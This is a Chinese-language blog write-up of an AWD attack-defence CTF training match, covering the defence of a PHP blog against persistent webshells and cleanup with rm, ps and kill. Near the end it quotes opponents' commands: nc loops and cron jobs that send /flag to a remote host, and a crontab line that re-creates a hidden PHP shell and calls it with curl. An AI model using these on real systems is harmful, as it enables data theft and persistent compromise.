0
星盟团队的内部awd训练,邀请我们团队参加,然后想着也没什么事情才怪就报名了。
0x1 日常操作
经常打比赛的师傅们都有事,Web方向就我一个打过awd的。。。累死
首先拿到ssh 一个简单的blog加一个phpmyadmin 上手打包,备份数据库,加上流量记录
看了下phpmyadmin是4.8.0,有个lfi 传送门 数据库有个admin密码123456 还有ctf密码ctf
phpmyadmin登录逻辑不好写。。。提前没准备 于是作大死手工登录一遍加别的用户。。。 然后作大死手工拿一遍flag再说
然后就凉凉了。。。
有个马 没 看 见 !!!
然后就被写满了不死马
0x2 苟起来
还有一堆没截图,找不到了
对于使用特殊文件名的马比如这次的--a.php #a.php等等
直接rm会,rm会把–a.php这样的文件名当成参数
需要rm -f -- *清除,--表示参数已经结束
当时好像是这么做的
chmod -R 777 .避免权限问题
rm -rf -- *转义并清掉所有目录
然后只需要对付根目录的不死马
频繁rm -rf,看ps -uax,把新的进程找到,一般pid都比较大,找ppid,kill掉
这招不起作用就rm -rf xx.php && mkdir xx.php删文件然后马上建个文件夹
搞了半天可算把形势控制住了
然后灵机一动。。。既然师傅们这么强,赶快学习一波
0x3 继续苟
把备份的源码复制一份,然后开始骚操作
把所有的php文件全部换成流量记录
check就check吧。。。
emmm先赶快弄脚本打那个back.php
看log,database.php还有mysql那个load_data读flag 估计要check 随便找个没问题的队复制粘贴纯静态 艹,忙不过来,那个mysql的不管了
继续看log
lfi那个早就修完了(用户删了) mysql那个load_data没空打因为。。。 锅从天上来 九点要去开会( 艹艹艹
抱上电脑去研究别的队的马了 挂上脚本 溜
溜之前先把check过了 找个看起来完好的站,httrack爬一遍纯静态,丢上去 完事
0x4 没了
emmm就这样苟完了 拿了个第四,就差第三25分,再上一局就第三了( 太菜了太菜了。。。但是真的忙不过来
别的师傅的马就不贴了,放点别的
echo -e 'while true\ndo\nnc -w 1 xx.xxx.xxx.xx 4444 < /flag >&1\nsleep 1m\ndone'> web_init.sh
echo '*/1 * * * * nc -w 1 xx.xxx.xxx.xx 4444 < /flag' > initflag.cron
后期又把拿到的马的文件名弄出来,搞上流量记录
大概别的师傅的马就是。。。先写个一句话,然后上计划任务getflag+不死马
不死马这样激活
echo '* * * * * [[ -e /var/www/html/.61bdb3c1a3dd2bbf384eb51ce49deb47.php ]]||/bin/cat /tmp/php_sessionAspR > /var/www/html/.61bdb3c1a3dd2bbf384eb51ce49deb47.php;/usr/bin/curl "http://xxxxxxxxxxx:11680/.61bdb3c1a3dd2bbf384eb51ce49deb47.php"' | crontab